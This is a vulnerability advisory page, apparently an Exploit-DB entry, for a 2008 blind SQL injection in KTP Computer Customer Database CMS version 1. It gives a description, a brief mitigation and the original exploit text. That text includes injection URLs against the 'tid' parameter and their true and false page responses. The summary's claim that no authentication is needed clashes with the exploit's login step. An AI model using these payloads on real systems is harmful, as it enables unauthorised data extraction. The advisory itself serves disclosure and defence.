KTPCCD CMS Blind SQL Injection Vulnerability

vendor:

KTP Computer Customer Database CMS

by:

CWH Underground

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: KTP Computer Customer Database CMS

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:ktp_computer_customer_database:ktp_computer_customer_database_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

KTPCCD CMS Blind SQL Injection Vulnerability

A vulnerability exists in KTP Computer Customer Database CMS version 1, which allows an attacker to perform a blind SQL injection attack. The vulnerability is due to insufficient sanitization of user-supplied input in the 'tid' parameter of the 'vtech' action of the 'tech' module. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database, potentially resulting in the manipulation or disclosure of arbitrary data. Authentication is not required to exploit this vulnerability.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be configured to use the most restrictive access control settings possible.

Source

Exploit-DB raw data:

================================================
  KTPCCD CMS Blind SQL Injection Vulnerability
================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 30 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : APPLICATION : KTP Computer Customer Database CMS
 VERSION     : 1
 DOWNLOAD    : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
#####################################################

**Need Magic_quote = Off**

--- Blind SQL Injection ---

Login as user or Register at http://[Target]/[ktp_path]/?p=tech&a=ntech then goto Exploit...

---------
 Exploit
---------

Test Blind SQL Injection in MYSQL Version 5

[!]True
[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=5--

Result
Home Phone: 122-131-3123
Cell Phone: 123-123-3123
Fax Number: 123-213-1321
A+ Certifcation ID: 312 


[!]False
[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=4--

Result
Home Phone: n/a
Cell Phone: n/a
Fax Number: n/a
A+ Certifcation ID: (Technician is not certified) 

#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-11-30]